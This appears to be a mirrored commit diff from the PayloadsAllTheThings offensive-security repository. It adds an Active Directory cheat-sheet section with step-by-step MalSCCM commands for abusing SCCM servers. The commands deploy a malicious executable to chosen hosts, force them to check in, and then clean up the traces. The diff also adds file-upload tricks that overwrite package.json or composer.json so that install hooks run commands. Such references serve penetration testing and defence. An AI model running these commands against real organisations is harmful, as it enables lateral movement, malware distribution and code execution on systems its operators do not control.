mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
SCCM deployment + JSON uploads
This commit is contained in:
parent
33ea0b54fb
commit
67457ec582
@ -105,6 +105,7 @@
|
|||||||
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
||||||
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
|
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
|
||||||
- [PrivExchange attack](#privexchange-attack)
|
- [PrivExchange attack](#privexchange-attack)
|
||||||
|
- [SCCM Deployment](#sccm-deployment)
|
||||||
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
|
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
|
||||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||||
- [DSRM Credentials](#dsrm-credentials)
|
- [DSRM Credentials](#dsrm-credentials)
|
||||||
@ -3238,6 +3239,63 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d
|
|||||||
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
|
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### SCCM Deployment
|
||||||
|
|
||||||
|
> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
|
||||||
|
|
||||||
|
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
|
||||||
|
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
|
||||||
|
|
||||||
|
* Compromise client, use locate to find management server
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe locate
|
||||||
|
```
|
||||||
|
* Enumerate over WMI as an administrator of the Distribution Point
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
|
||||||
|
```
|
||||||
|
* Compromise management server, use locate to find primary server
|
||||||
|
* use Inspect on primary server to view who you can target
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe inspect /all
|
||||||
|
MalSCCM.exe inspect /computers
|
||||||
|
MalSCCM.exe inspect /primaryusers
|
||||||
|
MalSCCM.exe inspect /groups
|
||||||
|
```
|
||||||
|
* Create a new device group for the machines you want to laterally move too
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
|
||||||
|
MalSCCM.exe inspect /groups
|
||||||
|
```
|
||||||
|
|
||||||
|
* Add your targets into the new group
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL
|
||||||
|
```
|
||||||
|
* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$`
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
|
||||||
|
MalSCCM.exe inspect /applications
|
||||||
|
```
|
||||||
|
|
||||||
|
* Deploy the application to the target group
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
|
||||||
|
MalSCCM.exe inspect /deployments
|
||||||
|
```
|
||||||
|
* Force the target group to checkin for updates
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe checkin /groupname:TargetGroup
|
||||||
|
```
|
||||||
|
|
||||||
|
* Cleanup the application, deployment and group
|
||||||
|
```ps1
|
||||||
|
MalSCCM.exe app /cleanup /name:demoapp
|
||||||
|
MalSCCM.exe group /delete /groupname:TargetGroup
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### RODC - Read Only Domain Controller Compromise
|
### RODC - Read Only Domain Controller Compromise
|
||||||
|
|
||||||
> If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username.
|
> If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username.
|
||||||
@ -3585,4 +3643,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||||||
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
|
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
|
||||||
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
|
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
|
||||||
* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
|
* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
|
||||||
* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
|
* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
|
||||||
|
* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/)
|
||||||
|
@ -96,8 +96,9 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
|
|||||||
|
|
||||||
### Configuration Files
|
### Configuration Files
|
||||||
|
|
||||||
If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
|
If you are trying to upload files to a :
|
||||||
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.
|
- PHP server, take a look at the .htaccess trick to execute code.
|
||||||
|
- ASP server, take a look at the .config trick to execute code.
|
||||||
|
|
||||||
Configuration files examples
|
Configuration files examples
|
||||||
- .htaccess
|
- .htaccess
|
||||||
@ -105,6 +106,21 @@ Configuration files examples
|
|||||||
- httpd.conf
|
- httpd.conf
|
||||||
- \_\_init\_\_.py
|
- \_\_init\_\_.py
|
||||||
|
|
||||||
|
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
|
||||||
|
- package.json
|
||||||
|
```js
|
||||||
|
"scripts": {
|
||||||
|
"prepare" : "/bin/touch /tmp/pwned.txt"
|
||||||
|
}
|
||||||
|
```
|
||||||
|
- composer.json
|
||||||
|
```js
|
||||||
|
"scripts": {
|
||||||
|
"pre-command-run" : [
|
||||||
|
"/bin/touch /tmp/pwned.txt"
|
||||||
|
]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
### CVE - Image Tragik
|
### CVE - Image Tragik
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user